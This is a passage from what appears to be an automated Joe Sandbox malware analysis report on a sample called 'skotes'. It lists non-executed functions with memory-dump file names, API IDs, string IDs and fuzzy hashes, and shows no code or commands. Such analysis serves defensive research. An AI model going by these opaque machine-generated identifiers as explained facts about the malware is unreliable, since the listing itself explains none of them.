                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateMutexSleep
                                                                                                                                              • String ID: T2F
                                                                                                                                              • API String ID: 1464230837-3862687658
                                                                                                                                              • Opcode ID: 1425c2742d253bcdab7a553ab4221dc652303d7b461d9b08eccbf9864a3c531a
                                                                                                                                              • Instruction ID: 788f5c7e75b265c863c5cbe6439b96c2a819d5d1061a0626877fcf6c47275106
                                                                                                                                              • Opcode Fuzzy Hash: 1425c2742d253bcdab7a553ab4221dc652303d7b461d9b08eccbf9864a3c531a
                                                                                                                                              • Instruction Fuzzy Hash: 602148727003009BEB189B68DC897ADB761DBD2311F24463FE408A77D0C77D5990835B

                                                                                                                                              Non-executed Functions

                                                                                                                                              Function 00402EC0 Relevance: 10.8, APIs: 7, Instructions: 272threadCOMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 57040152-0
                                                                                                                                              • Opcode ID: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
                                                                                                                                              • Instruction ID: 2ceb4b633ad4a171d295bd911596fac7f10c239a595cf67c3a826b401b9ecef4
                                                                                                                                              • Opcode Fuzzy Hash: 7a31e774ce5160496b868481ad1714a18b6c01a7f89619dc1ccf0676da36917e
                                                                                                                                              • Instruction Fuzzy Hash: 9EA10170A01205AFDB10DF65C94579BBBA8FF18315F00817BE815EB381EB39EA44CB99
                                                                                                                                              Function 0043CBDF Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 320COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _strrchr
                                                                                                                                              • String ID: vC
                                                                                                                                              • API String ID: 3213747228-1921080006
                                                                                                                                              • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                              • Instruction ID: 8cae4ceb00b15cc6f8fe4719d8afecb37dc1afbf88934ae700027118ad1b5c75
                                                                                                                                              • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                              • Instruction Fuzzy Hash: DEB1F3329046459FEB15CF28C8C27AEBBA5EF49344F24916BE855FB341D6389D02CB68
                                                                                                                                              Function 0041BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737450976.000000000046B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737465281.0000000000475000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737478317.0000000000476000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737491111.0000000000477000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737575091.00000000005D0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737589361.00000000005D2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737604157.00000000005E0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737618042.00000000005E1000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005E4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737631181.00000000005EC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737659689.00000000005F0000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737672724.00000000005F1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737687676.00000000005F2000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737701260.00000000005F4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737714406.00000000005F5000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737727604.00000000005F6000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737744010.0000000000607000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737758407.0000000000608000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737775519.000000000061D000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737789418.000000000061F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737803367.0000000000627000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737817369.0000000000630000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737837954.0000000000654000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737852394.000000000065E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737865663.000000000065F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737879466.0000000000662000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737893282.0000000000669000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737908217.000000000066A000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737922115.0000000000671000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737935580.0000000000673000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737949609.000000000067B000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737963539.000000000067F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737976569.0000000000680000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737989660.0000000000681000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738002438.0000000000682000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738015186.0000000000683000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738028581.0000000000684000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.000000000068C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738042575.00000000006CA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738084913.00000000006F4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738099533.00000000006F5000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738113133.00000000006F6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738126850.00000000006FB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738140020.00000000006FD000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738155793.000000000070B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738169496.000000000070C000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738184429.000000000070D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1738197475.000000000070E000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_skotes.jbxd
                                                                                                                                              Yara matches
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 531285432-0
                                                                                                                                              • Opcode ID: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction ID: 8ea58e001adf984e7c012f60bfadf62abbd4b5fd5d949d96f5012e2c2c88c0a4
                                                                                                                                              • Opcode Fuzzy Hash: 8fb497d2bd26701da310c8a10b06eb0e495a2980e837e3252cd03f3267250895
                                                                                                                                              • Instruction Fuzzy Hash: 08216275A00219AFDF00EFA5CC819FEB7B9EF08714F10006AF601B7291DB389D419BA5
                                                                                                                                              Function 0043F35F Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 113COMMONLIBRARYCODE
                                                                                                                                              Download Yara Rule
                                                                                                                                              APIs
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000001.00000002.1737390167.0000000000401000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 00000001.00000002.1737373564.0000000000400000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737390167.0000000000462000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                              • Associated: 00000001.00000002.1737437708.0000000000469000.00000004.00000001.01000000.00000008.sdmpDownload File
